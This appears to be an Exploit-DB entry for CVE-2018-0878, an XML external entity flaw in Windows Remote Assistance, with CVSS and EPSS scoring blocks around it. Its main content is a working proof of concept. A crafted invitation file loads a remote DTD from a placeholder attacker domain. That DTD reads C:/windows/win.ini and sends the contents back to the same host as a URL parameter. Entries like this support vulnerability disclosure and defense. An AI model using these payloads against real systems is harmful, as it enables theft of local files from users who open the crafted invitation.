Lucene search

K
exploitdbNabeel AhmedEDB-ID:44352
HistoryMar 28, 2018 - 12:00 a.m.

Microsoft Windows Remote Assistance - XML External Entity Injection

2018-03-2800:00:00
Nabeel Ahmed
www.exploit-db.com
29

2.6 Low

CVSS2

Attack Vector

NETWORK

Attack Complexity

HIGH

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:H/Au:N/C:P/I:N/A:N

3.1 Low

CVSS3

Attack Vector

NETWORK

Attack Complexity

HIGH

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N

5.8 Medium

AI Score

Confidence

High

0.086 Low

EPSS

Percentile

94.5%

# Exploit Title: Microsoft Windows Remote Assistance XXE
# Date: 27/03/2018
# Exploit Author: Nabeel Ahmed
# Tested on: Windows 7 (x64), Windows 10 (x64)
# CVE : CVE-2018-0878
# Category: Remote Exploits

Invitation.msrcincident
------------------------
<?xml version="1.0" encoding="UTF-8" ?>  
<!DOCTYPE zsl [  
<!ENTITY % remote SYSTEM "http://<yourdomain.com>/xxe.xml">  
%remote;%root;%oob;]>

xxe.xml
------------------------
<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">  
<!ENTITY % root "<!ENTITY &#37; oob SYSTEM 'http://<yourdomain.com>/?%payload;'> ">

Reference: https://krbtgt.pw/windows-remote-assistance-xxe-vulnerability/
Reference: Vulnerability discovered by Nabeel Ahmed (@NabeelAhmedBE) of Dimension Data (https://www.dimensiondata.com)

2.6 Low

CVSS2

Attack Vector

NETWORK

Attack Complexity

HIGH

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:H/Au:N/C:P/I:N/A:N

3.1 Low

CVSS3

Attack Vector

NETWORK

Attack Complexity

HIGH

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N

5.8 Medium

AI Score

Confidence

High

0.086 Low

EPSS

Percentile

94.5%